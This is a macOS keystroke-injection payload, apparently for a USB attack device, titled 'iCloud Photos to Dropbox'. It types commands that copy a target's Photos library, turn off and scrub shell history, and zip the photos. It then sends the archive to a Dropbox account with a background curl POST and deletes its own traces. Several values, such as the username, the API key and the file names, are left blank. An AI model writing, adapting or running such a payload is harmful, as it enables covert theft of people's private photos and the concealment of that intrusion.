REM This Script will copy the Photos library folder and send them to your dropbox API REM Replace '' with the systems actual username REM Replace '' with your actual Dropbox API key REM Here's the breakdown, we navigate to the finder REM use the Shift GUI G to open up the "go to folder" menu. REM Then we search for & open the photos folder. REM Now we can type "li" to navigate to the library folder that contains the photos REM we copy it and navigate to a new window to paste the folder REM Then we zip the folder and rename it "Targets_photos" and send it to the dropbox REM Using the nohup and & to make sure the code is executed REM Requirements Must have at least two windows open REM Dropbox API key and targets system username REM Author: Narsty REM Title: iCloud Photos to Dropbox REM Version 1.0 MacOs REM Category: Execution ID 05ac:021e Apple:Keyboard DELAY 500 GUI SPACE DELAY 500 STRING Finder DELAY 1000 ENTER DELAY 2000 GUI-SHIFT g DELAY 1000 STRING /Users//Library/photos DELAY 500 ENTER DELAY 1000 STRING li DELAY 500 GUI c DELAY 500 CTRL RIGHTARROW DELAY 1000 GUI v DELAY 15000 GUI SPACE DELAY 500 STRING terminal DELAY 1000 ENTER DELAY 500 CTRL c DELAY 500 STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash DELAY 500 ENTER DELAY 500 STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER DELAY 500 ENTER DELAY 1000 STRING echo 'cd ~/Desktop && zip -r Libraries && curl -X POST -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary' > DELAY 1000 ENTER DELAY 2000 STRING chmod +x DELAY 500 ENTER DELAY 500 STRING nohup ./ >/dev/null 2>&1 & DELAY 500 ENTER DELAY 7000 CTRL C DELAY 500 STRING rm -r ~/Desktop/libraries DELAY 1000 ENTER DELAY 500 STRING rm DELAY 500 ENTER DELAY 5000 STRING rm -r ~/Desktop/ ENTER DELAY 500 STRING CLEAR DELAY 500 ENTER DELAY 500 GUI w DELAY 500 ENTER